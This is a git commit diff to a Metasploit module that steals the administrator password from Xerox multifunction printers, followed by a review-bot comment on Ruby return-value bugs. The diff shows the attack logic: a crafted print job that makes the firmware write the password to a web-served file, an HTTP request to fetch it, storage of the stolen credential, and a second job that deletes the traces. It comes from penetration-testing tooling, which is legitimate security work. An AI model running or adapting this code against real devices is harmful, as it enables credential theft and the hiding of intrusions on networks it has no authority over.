
Commit 02b1c5c

committed
Final changes
1 parent 127d164 commit 02b1c5c


1 file changed

+24
-21
lines changed


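--- a/modules/auxiliary/gather/xerox_pwd_extract.rb
+++ b/modules/auxiliary/gather/xerox_pwd_extract.rb
@@ -1,7 +1,8 @@
 #
-# This module requires Metasploit: http//metasploit.com/download
+# This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
+
 require 'msf/core'
 
 class Metasploit3 < Msf::Auxiliary
@@ -13,7 +14,8 @@ def initialize(info={})
 super(update_info(info,
 'Name' => 'Xerox Administrator Console Password Extract',
 'Description' => %{
-This module will extract the management consoles admin password from the Xerox file system using firmware bootstrap injection.
+This module will extract the management consoles admin password from the Xerox file system
+using firmware bootstrap injection.
 },
 'Author' =>
 [
@@ -31,37 +33,40 @@ def initialize(info={})
 ], self.class)
 end
 
+def jport
+datastore['JPORT']
+end
+
 # Time to start the fun
 def run
-print_status("Attempting to extract the web consoles admin password from the Xerox MFP at #{rhost}")
-unless write
-return
-end
+print_status("#{rhost}:#{jport} - Attempting to extract the web consoles admin password...")
+return unless write
+
+print_status("#{rhost}:#{jport} - Waiting #{datastore['TIMEOUT']} seconds...")
 sleep(datastore['TIMEOUT'])
 passwd = retrieve
 remove
 
 if passwd
-print_good("#{rhost}:#{rport} - Password found: #{passwd}")
+print_good("#{rhost}:#{jport} - Password found: #{passwd}")
 
 loot_name = 'xerox.password'
 loot_type = 'text/plain'
-loot_filename = 'xerox-password.text'
+loot_filename = 'xerox_password.text'
 loot_desc = 'Xerox password harvester'
 p = store_loot(loot_name, loot_type, datastore['RHOST'], passwd, loot_filename, loot_desc)
-print_status("Credentials saved in: #{p}")
+print_status("#{rhost}:#{jport} - Credentials saved in: #{p}")
 
 register_creds('Xerox-HTTP', rhost, rport, 'Admin', passwd)
 
 else
-print_status('No credentials extracted')
-return
+print_error("#{rhost}:#{jport} - No credentials extracted")
 end
 end
 
 #Trigger firmware bootstrap write out password data to URL root
 def write
-print_status('Sending print job')
+print_status("#{rhost}:#{jport} - Sending print job")
 create_print_job = '%%XRXbegin' + "\x0a"
 create_print_job << '%%OID_ATT_JOB_TYPE OID_VAL_JOB_TYPE_DYNAMIC_LOADABLE_MODULE' + "\x0a"
 create_print_job << '%%OID_ATT_JOB_SCHEDULING OID_VAL_JOB_SCHEDULING_AFTER_COMPLETE' + "\x0a"
@@ -89,18 +94,17 @@ def write
 create_print_job << "\x00\x28\x00\x00"
 
 begin
-connect(true, 'RPORT' => datastore['JPORT'].to_i)
+connect(true, 'RPORT' => jport)
 sock.put(create_print_job)
 rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, HostUnreachable, Rex::ConnectionTimeout, Rex::AddressInUse
-print_error("Error connecting to #{rhost}")
-return
+print_error("#{rhost}:#{jport} - Error connecting to #{rhost}")
 ensure
 disconnect
 end
 end
 
 def retrieve
-print_status("Retrieving password from #{rhost}")
+print_status("#{rhost}:#{jport} - Retrieving password from #{rhost}")
 request = "GET /Praeda.txt HTTP/1.0\r\n\r\n"
 
 begin
@@ -110,7 +114,7 @@ def retrieve
 passwd = res.match(/\r\n\s(.+?)\n/)
 return passwd ? passwd[1] : ''
 rescue ::EOFError, ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, HostUnreachable, Rex::ConnectionTimeout, Rex::AddressInUse, EOFError
-print_error("Error getting password from #{rhost}")
+print_error("#{rhost}:#{jport} - Error getting password from #{rhost}")
 return
 ensure
 disconnect
@@ -119,7 +123,7 @@ def retrieve
 
 # Trigger firmware bootstrap to delete the trace files and praeda.txt file from URL
 def remove
-print_status('Removing print job')
+print_status("#{rhost}:#{jport} - Removing print job")
 remove_print_job = '%%XRXbegin' + "\x0A"
 remove_print_job << '%%OID_ATT_JOB_TYPE OID_VAL_JOB_TYPE_DYNAMIC_LOADABLE_MODULE' + "\x0A"
 remove_print_job << '%%OID_ATT_JOB_SCHEDULING OID_VAL_JOB_SCHEDULING_AFTER_COMPLETE' + "\x0A"
@@ -144,11 +148,10 @@ def remove
 remove_print_job << "\x75\xe1\x00\x28\x00\x00"
 
 begin
-connect(true, 'RPORT' => datastore['JPORT'].to_i)
+connect(true, 'RPORT' => jport)
 sock.put(remove_print_job)
 rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, HostUnreachable, Rex::ConnectionTimeout, Rex::AddressInUse
-print_error("Error removing print job from #{rhost}")
-return
+print_error("#{rhost}:#{jport} - Error removing print job from #{rhost}")
 ensure
 disconnect
 end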
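Review bot: With the explicit `return` dropped from the rescue branch of `write`, the guard `return unless write` in `run` now depends on whatever `print_error` happens to return, so a failed connection only stops the run if that value is falsy. Make the contract explicit by ending the rescue branch with `return false` and adding `true` after `sock.put(create_print_job)`. The failure signal is also unreliable in the other direction: `retrieve` returns `''` when the regex does not match, and an empty string is truthy in Ruby, so `if passwd` still stores loot and calls `register_creds` with an empty password, and the new "No credentials extracted" error is reached only after a connection error; `return passwd ? passwd[1] : nil` would let the else branch cover both cases. The bodies of `write` and `retrieve` are only partly visible in these hunks, so both points should be checked against the full methods.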
